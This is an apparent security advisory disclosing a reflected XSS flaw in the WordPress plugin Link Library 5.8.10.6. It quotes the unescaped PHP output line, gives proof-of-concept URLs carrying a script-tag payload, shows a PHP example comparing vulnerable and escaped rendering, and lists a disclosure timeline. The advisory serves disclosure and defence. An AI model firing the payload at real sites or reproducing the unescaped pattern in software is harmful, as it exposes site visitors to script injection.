08-11-2014 / Vulnerabilities

Link Library 5.8.10.6 Reflected XSS

$_GET['searchll'] is not escaped.

File: link-library\render-link-library-sc.php

if ( 'search' == $mode ) {
    $output .= '<div class="resulttitle">' . __('Search Results for', 'link-library') . ' "' . stripslashes( $_GET['searchll'] ) . '"</div>';
}

Proof of Concept

The XSS is visible on any page containing the [link-library settings=1] shortcode tag.

http://wordpress_install/page_with_tag/?searchll=word_that_must_found_some_link <script>alert("XSS");</script>

The XSS is only visible if the search function returns something.

So we can use a common letter ("a" or "e") and put the XSS payload after a space. For example:

http://wordpress_install/page_with_tag/?searchll=a <script>alert("XSS");</script>
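The vulnerable line from render-link-library-sc.php next to one hardened form, as an added example that is not the plugin's code or its actual 5.8.11 fix. The __() and esc_html() stand-ins are assumptions so it runs outside WordPress, and the constructed input mirrors the proof-of-concept query above.

```php
<?php
// Added example, not the plugin's own code. Outside WordPress, __() and
// esc_html() do not exist, so minimal stand-ins are defined here (assumption).
if ( ! function_exists( '__' ) ) {
    function __( $text, $domain = 'default' ) {
        return $text;
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    // Approximation of WordPress esc_html(): encode &, <, >, " and ' for an
    // HTML text context.
    function esc_html( $text ) {
        return htmlspecialchars( $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Vulnerable rendering, mirroring the advisory: the request value is
// concatenated into HTML after stripslashes() with no output escaping.
function render_search_title_vulnerable( $searchll ) {
    return '<div class="resulttitle">' . __( 'Search Results for', 'link-library' )
        . ' "' . stripslashes( $searchll ) . '"</div>';
}

// Hardened rendering (one common fix pattern, assumed here): escape at the
// point of output, for the HTML text context the value lands in, after any
// unslashing. esc_html() is the right call for element content; attribute
// values would need esc_attr() instead.
function render_search_title_safe( $searchll ) {
    return '<div class="resulttitle">' . __( 'Search Results for', 'link-library' )
        . ' "' . esc_html( stripslashes( $searchll ) ) . '"</div>';
}

// True when no raw <script tag survives in the rendered markup.
function is_script_neutralised( $html ) {
    return stripos( $html, '<script' ) === false;
}

// Constructed input equivalent to ?searchll=a <script>alert("XSS");</script>
$searchll = 'a <script>alert("XSS");</script>';

$vulnerable = render_search_title_vulnerable( $searchll );
$safe       = render_search_title_safe( $searchll );

echo $vulnerable, PHP_EOL;
echo $safe, PHP_EOL;
echo 'vulnerable neutralised: ', var_export( is_script_neutralised( $vulnerable ), true ), PHP_EOL;
echo 'hardened neutralised:   ', var_export( is_script_neutralised( $safe ), true ), PHP_EOL;
```

Run it with `php example.php`; the first line still carries the raw script tag while the second carries it entity-encoded, which is exactly the difference between the 5.8.10.6 behaviour described above and an escaped output.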

Timeline

  • 06-11-2014: Discovered
  • 06-11-2014: Vendor notified
  • 07-11-2014: Version 5.8.11 released, issue resolved